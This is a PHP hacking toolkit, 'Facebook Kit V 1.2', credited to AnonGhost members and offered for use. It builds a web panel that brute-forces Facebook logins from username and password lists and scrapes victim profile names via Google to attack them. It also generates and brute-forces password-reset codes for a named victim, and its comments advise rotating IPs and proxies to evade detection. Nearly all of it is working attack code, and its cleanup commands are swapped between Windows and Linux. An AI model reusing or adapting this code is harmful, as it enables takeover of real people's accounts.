Facebook Kit V 1.2

1. <?php
2. session_start();
3. error_reporting(E_ERROR | E_PARSE);
4. @ini_set("max_execution_time",0);
5. @set_time_limit(0); #No Fx in SafeMode
6. @ignore_user_abort(TRUE);
7. @set_magic_quotes_runtime(0);
8. ##############################################################################
9. // Use your mind to escape Facebook Security \!/ #
10. // Don't Allow Cookies in your browser (Use priv8 browsing) #
11. // Change your IP and DNS each 2 seconds and your Job will be Great °_° #
12. // GreetZ To : All AnonGhost MemberZ \!/ #
13. // You can edit this script but don't forget to mention the authors °_° #
14. // Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48 #
15. ##############################################################################
16. echo '
17. <html>
18. <title>Facebook Kit</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
19. <body style="background-color:black;">
20. <style type="text/css">
21. body {
22. background:
23. url("http://i.imgur.com/hg21xZ9.png") repeat ,
24. url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
25. background-color: #000000;
26. }
27. a{
28. text-decoration:none;
29. border:1px solid #12549c;
30. border-radius:5px;
31. background-color:black;
32. color:white;
33. font-family:Arial;
34. font-size:17;
35. box-shadow: 0px 0px 12px #21a0ed;
36. }
37. #r{
38. border-bottom:1px solid #12549c;
39. }
40. </style>
41.  
42. <head>
43. </body>
44. </html>
45. <center><font color="white" face="Orbitron" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
46. ';
47.  
48. echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</center>';
49.  
50. echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
51.  
52. echo '</font></b></div><br></center>';
53.  
54. ?>
55. <div id="det" align="center">
56.  
57. </div>
58. </center>
59. <div id="r" align="center">
60. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>">&nbsp;Home&nbsp;</a></font>
61. <a href="?action=baipas">&nbsp;FB Brute Force&nbsp;</a></font>
62. <a href="?action=brut">&nbsp;FB Ghost Catcher&nbsp;</a></font>
63. <a href="?action=crack">&nbsp;FB Reset Code&nbsp;</a></font>
64. <a href="?action=passgen">&nbsp;Reset Code Generator&nbsp;</a></font>
65. <a href="?action=idgen">&nbsp;FB ID Generator&nbsp;</a></font>
66. <a href="?action=graph">&nbsp;FB ID Checker&nbsp;</a></font>
67. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
68. </div><br>
69. <?php
70. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
71. @error_reporting(0);
72. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
73. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
74. $validCharNumber = strlen($validCharacters);
75. $len = 10;
76. $result = "";
77.  
78. for ($i = 0; $i < $len; $i++) {
79. $index = mt_rand(0, $validCharNumber - 1);
80. $result .= $validCharacters[$index];
81. }
82.  
83. return $result;
84. }
85. echo'
86. <style>
87. textarea {
88. resize:none;
89. color: #1975FF ;
90. border:1px solid #1975FF ;
91. border-left: 4px solid #1975FF ;
92. }
93. input {
94. color: ##33CCFF;
95. border:1px dotted #33CCFF;
96. }
97. </style>
98. <p><center><font face="impact" color="White" size="4">Facebook ID Generator
99. </center><center></font><br>
100. <title>Facebook ID Generator</title>
101. <form method="post">
102. <font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
103. <input type="submit" value="Generate" name="fbmailgen">
104. </form><br>';
105.  
106. $len = $_POST['len'];
107. $nr = $_POST['nr'];
108. if ($_POST['fbmailgen']) {
109. echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
110. for ($x=0; $x < $nr ; $x++){
111. echo "10000" . getRandomString() . "\r\n";
112. }
113. echo "</textarea><br>";
114. echo "
115. <br>
116. <b>
117. </b>
118. <br>
119. ";
120. }
121. }
122. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
123. @error_reporting(0);
124. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
125. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
126. $validCharNumber = strlen($validCharacters);
127. $len = 6;
128. $result = "";
129.  
130. for ($i = 0; $i < $len; $i++) {
131. $index = mt_rand(0, $validCharNumber - 1);
132. $result .= $validCharacters[$index];
133. }
134.  
135. return $result;
136. }
137. echo'
138. <style>
139. textarea {
140. resize:none;
141. color: #1975FF ;
142. border:1px solid #1975FF ;
143. border-left: 4px solid #1975FF ;
144. }
145. input {
146. color: ##33CCFF;
147. border:1px dotted #33CCFF;
148. }
149. </style>
150. <p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
151. </center><center><br>
152. <title>Facebook Reset Code Generator</title>
153. <form method="post">
154. <font color="white">Number Of Reset Codes : &nbsp;&nbsp;<input type="text" name="nr"><br><br></font>
155. <input type="submit" value="Generate" name="fbmailgen">
156. </form><br>';
157. $len = $_POST['len'];
158. $nr = $_POST['nr'];
159. if ($_POST['fbmailgen']) {
160. echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
161. for ($x=0; $x < $nr ; $x++){
162. echo getRandomString() . "\r\n";
163. }
164. echo "</textarea><br>";
165. echo "
166. <br>
167. <b>
168. </b>
169. <br>
170. ";
171. }}
172. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
173. echo"
174. <style>
175. textarea {
176. resize:none;
177. color: #1975FF ;
178. border:1px solid #1975FF ;
179. border-left: 4px solid #1975FF ;
180. }
181. input {
182. color: ##33CCFF;
183. border:1px dotted #33CCFF;
184. }
185. select {
186. color: ##33CCFF;
187. border:1px dotted #33CCFF;
188. }
189. </style>
190. <title>F4c3b00k Gh0sT</title>
191. <form method='POST'>
192. <center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
193. <center>
194. <center><font face='arial' size='1' color='red'>Server</font><br></center>
195. <select name=country><br><br>
196. <option value='Choose Country'>Choose The Country</option>
197. <option value='site:fr-fr.facebook.com/'>France</option>
198. <option value='site:ar-ar.facebook.com/'>Arab Countries</option>
199. <option value='site:es-es.facebook.com/'>Spain</option>
200. <option value='site:tr-tr.facebook.com/'>Turkey</option>
201. <option value='site:de-de.facebook.com/'>Germany</option>
202. <option value='site:pt-pt.facebook.com/'>Portugual</option>
203. <option value='site:it-it.facebook.com/'>Italy</option>
204. <option value='site:hi-in.facebook.com/'>India</option>
205. <option value='site:sr-rs.facebook.com/'>Serbia</option>
206. <option value='site:el-gr.facebook.com/'>Greece</option>
207. <option value='site:he-il.facebook.com/'>Israel</option>
208. <option value='site:id-id.facebook.com/'>Indonesia</option>
209. <option value='site:ru-ru.facebook.com/'>Russia</option>
210. <option value='site:nl-nl.facebook.com/'>Netherlands</option>
211. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
212. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
213. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
214. <option value='site:zh-cn.facebook.com/'>China</option>
215. </select><br><br>
216. </center>
217. <center>
218. <input type='text' name='victim' placeholder='Victim Name'><br><br>
219. <textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
220. <input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
221. </form>
222. <center>
223. <font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
224. ";
225. set_time_limit(0);
226. ini_set('memory_limit', '64M');
227. header('Content-Type: text/html; charset=UTF-8');
228. function letItBy(){ ob_flush(); flush(); }
229.  
230. $country = $_POST['country'];
231. $victim = $_POST['victim'];
232. $bing = "{$country}"."{$victim}";
233. $password = explode("\r\n",htmlentities($_POST['pass']));
234. //Function that gets google urls
235. function google_that($query, $page=1)
236. {
237. $resultPerPage=8;
238. $start = $page*$resultPerPage;
239. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
240. $resultFromGoogle = json_decode( http_get($url, true) ,true);
241. if(isset($resultFromGoogle['responseStatus'])) {
242. if($resultFromGoogle['responseStatus'] != '200') return false;
243. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
244. else return $resultFromGoogle['responseData']['results'];
245. }
246. else
247. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
248. }
249. function http_get($url, $safemode = false){
250. if($safemode === true) sleep(1);
251. $im = curl_init($url);
252. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
253. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
254. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
255. curl_setopt($im, CURLOPT_HEADER, 0);
256. return curl_exec($im);
257. curl_close();
258. }
259. function brute($user,$pass){
260. $ch = curl_init();
261. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
262. curl_setopt($ch, CURLOPT_HEADER, 0);
263. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
264. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
265. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
266. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
267. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
268. $login = curl_exec($ch);
269. //print_r($login);
270. $check = (eregi('class="s t i u"',$login)) ? true:false;
271. if($check == true){
272. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
273. }else{
274. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
275. }
276. }
277.  
278.  
279. if(isset($_POST['start'])){
280.  
281. letItBy();
282. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
283. $googleResult = google_that($bing, $googlePage);
284. if(!$googleResult) {
285. echo 'Finished scanning.';
286.  
287. break;
288. }
289.  
290. // Gets the username of victim
291.  
292. for($victim = 0; $victim < sizeof($googleResult); $victim++){
293.  
294. $result = $googleResult[$victim]['unescapedUrl'];
295. if($country == "site:fr-fr.facebook.com/"){
296. $rsss = str_replace("https://fr-fr.facebook.com/","",$result);
297. }
298. elseif($country == "site:ar-ar.facebook.com/"){
299. $rsss = str_replace("https://ar-ar.facebook.com/","",$result);
300. }
301. elseif($country == "site:es-es.facebook.com/"){
302. $rsss = str_replace("https://es-es.facebook.com/","",$result);
303. }
304. elseif($country == "site:tr-tr.facebook.com/"){
305. $rsss = str_replace("https://tr-tr.facebook.com/","",$result);
306. }
307. elseif($country == "site:de-de.facebook.com/"){
308. $rsss = str_replace("https://de-de.facebook.com/","",$result);
309. }
310. elseif($country == "site:pt-pt.facebook.com/"){
311. $rsss = str_replace("https://pt-pt.facebook.com/","",$result);
312. }
313. elseif($country == "site:it-it.facebook.com/"){
314. $rsss = str_replace("https://it-it.facebook.com/","",$result);
315. }
316. elseif($country == "site:hi-in.facebook.com/"){
317. $rsss = str_replace("https://hi-in.facebook.com/","",$result);
318. }
319. elseif($country == "site:zh-cn.facebook.com/"){
320. $rsss = str_replace("https://zh-cn.facebook.com/","",$result);
321. }
322. elseif($country == "site:sr-rs.facebook.com/"){
323. $rsss = str_replace("https://sr-rs.facebook.com/","",$result);
324. }
325. elseif($country == "site:el-gr.facebook.com/"){
326. $rsss = str_replace("https://el-gr.facebook.com/","",$result);
327. }
328. elseif($country == "site:he-il.facebook.com/"){
329. $rsss = str_replace("https://he-il.facebook.com/","",$result);
330. }
331. elseif($country == "site:id-id.facebook.com/"){
332. $rsss = str_replace("https://id-id.facebook.com/","",$result);
333. }
334. elseif($country == "site:ru-ru.facebook.com/"){
335. $rsss = str_replace("https://ru-ru.facebook.com/","",$result);
336. }
337. elseif($country == "site:nl-nl.facebook.com/"){
338. $rsss = str_replace("https://nl-nl.facebook.com/","",$result);
339. }
340. elseif($country == "site:bg-bg.facebook.com/"){
341. $rsss = str_replace("https://bg-bg.facebook.com/","",$result);
342. }
343. elseif($country == "site:mk-mk.facebook.com/"){
344. $rsss = str_replace("https://mk-mk.facebook.com/","",$result);
345. }
346. elseif($country == "site:uk-ua.facebook.com/"){
347. $rsss = str_replace("https://uk-ua.facebook.com/","",$result);
348. }
349. $users = explode("?", $rsss);
350. $users = $users[0];
351.  
352. //Bruteforce Function
353.  
354. foreach($password as $pass)
355. {
356.  
357. echo brute($users,$pass);
358. }}}}
359.  
360. #
361. if(stristr(php_uname(),"Windows"))
362. {system("rm cookie.txt");}
363. else if(stristr(php_uname(),"Linux"))
364. {system("del cookie.txt");}}
365. #
366. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
367. ob_start();
368. @set_time_limit(0);
369. echo "
370. <head>
371. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
372. <form method='POST'>
373. <title>Facebook Brute Force 2014</title>
374. </head>
375. <style>
376. textarea {
377. resize:none;
378. color: #1975FF ;
379. border:1px solid #1975FF ;
380. border-left: 4px solid #1975FF ;
381. }
382. input {
383. color: ##33CCFF;
384. border:1px dotted #33CCFF;
385. }
386. </style>";
387.  
388. echo "
389. <body text='#FFFFFF' >
390. <center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
391. <p dir='ltr' align='center'>
392. <textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
393. <textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
394. <br>
395. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
396. if(isset($_POST['scan'])){
397. #To Put Proxy SOCKS V5
398. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
399. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
400. function brute($user,$pass){
401. $ch = curl_init();
402. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
403. curl_setopt($ch, CURLOPT_HEADER, 0);
404. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
405. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
406. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
407. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
408. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
409. $login = curl_exec($ch);
410. //print_r($login);
411. $check = (eregi('class="s t i u"',$login)) ? true:false;
412. if($check == true){
413. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
414. }else{
415. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
416. }
417. }
418.  
419.  
420.  
421.  
422. $username = explode("\n", htmlentities($_POST['username']));
423. $password = explode("\n", htmlentities($_POST['password']));
424.  
425.  
426. foreach($username as $users) {
427. $users = @trim($users);
428. foreach($password as $pass) {
429. $pass = @trim($pass);
430. echo brute($users,$pass);
431. }
432.  
433. }
434.  
435.  
436. #
437. if(stristr(php_uname(),"Windows"))
438. {system("rm cookie.txt");}
439. else if(stristr(php_uname(),"Linux"))
440. {system("del cookie.txt");}
441. #
442. }
443. echo"<br>
444. <br>
445. <br>
446. <br>
447. ";
448.  
449. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
450.  
451. @set_time_limit(0);
452. echo "<form method='POST'>
453. <title>Facebook Code Security Cracker > By Mauritania Attacker</title>
454. <style>
455. /* Rounded Corners */
456. #ghost {
457. resize:none;
458. color: #1975FF ;
459. border:1px solid #1975FF ;
460. border-left: 4px solid #1975FF ;
461. height: 250px;
462. width: 200px; }
463. input {
464. /* INPUTS */
465. border: 1px solid #12549c;
466. }
467. </style>
468. <center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
469. <center><input type='text' name='target' placeholder='Victim'></center><br>
470. <center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
471. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
472. </form>";
473. $target=$_POST['target'];
474. $user = explode("\r\n", htmlentities($_POST['code']));
475. if($_POST['scan'])
476. {
477. foreach($user as $code)
478. {
479. // Curl Function ^_^
480. $ch = curl_init();
481. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
482. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
483. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
484. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
485. curl_setopt($ch, CURLOPT_HEADER, 1);
486. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
487.  
488. $check = curl_exec($ch);
489. if(eregi("password_new", $check)) //Keyword Good Response ^_^
490. {
491. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
492. }
493. else
494. {
495. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
496. }
497. curl_close($ch);
498. }
499. }
500. #
501. if(stristr(php_uname(),"Windows"))
502. {system("rm cookie.txt");}
503. else if(stristr(php_uname(),"Linux"))
504. {system("del cookie.txt");}}
505. }
506. #
507. echo "</center><center>";
508.  
509.  
510.  
511.  
512. ob_end_flush();
513.  
514.  
515. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
516.  
517. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
518.  
519.  
520.  
521. @set_time_limit(0);
522. echo "<form method='POST'>
523. <title>Facebook ID's Checker By Mauritania Attacker</title>
524. <style>
525. /* Rounded Corners */
526. #ghost {
527. resize:none;
528. color: #1975FF ;
529. border:1px solid #1975FF ;
530. border-left: 4px solid #1975FF ;
531. height: 250px;
532. width: 200px; }
533. input {
534. /* INPUTS */
535. border: 1px solid #12549c;
536. }
537. </style>
538. <center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
539. <center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
540. <p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
541. </form>";
542.  
543. $user = explode("\r\n", htmlentities($_POST['code']));
544. if($_POST['scan'])
545. {
546. foreach($user as $code)
547. {
548. // Curl Function ^_^
549. $ch = curl_init();
550. curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
551. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
552. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
553. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
554. curl_setopt($ch, CURLOPT_HEADER, 1);
555. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
556.  
557. $check = curl_exec($ch);
558. if(eregi("username", $check)) //Keyword Good Response ^_^
559. {
560. echo "<font face='Tahoma' size='2' color='green'>{$code} => ID IS CORRECT ^_^ </font><br>";
561. }
562. else
563. {
564. echo "<font face='Tahoma' size='2' color='red'>{$code} => ID IS FALSE :(...</font><br>";
565. }
566. curl_close($ch);
567. }
568. }
569. #
570. if(stristr(php_uname(),"Windows"))
571. {system("rm cookie.txt");}
572. else if(stristr(php_uname(),"Linux"))
573. {system("del cookie.txt");}}
574. #
575. echo "</center><center>";
576. ob_end_flush();
577. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
578. ?>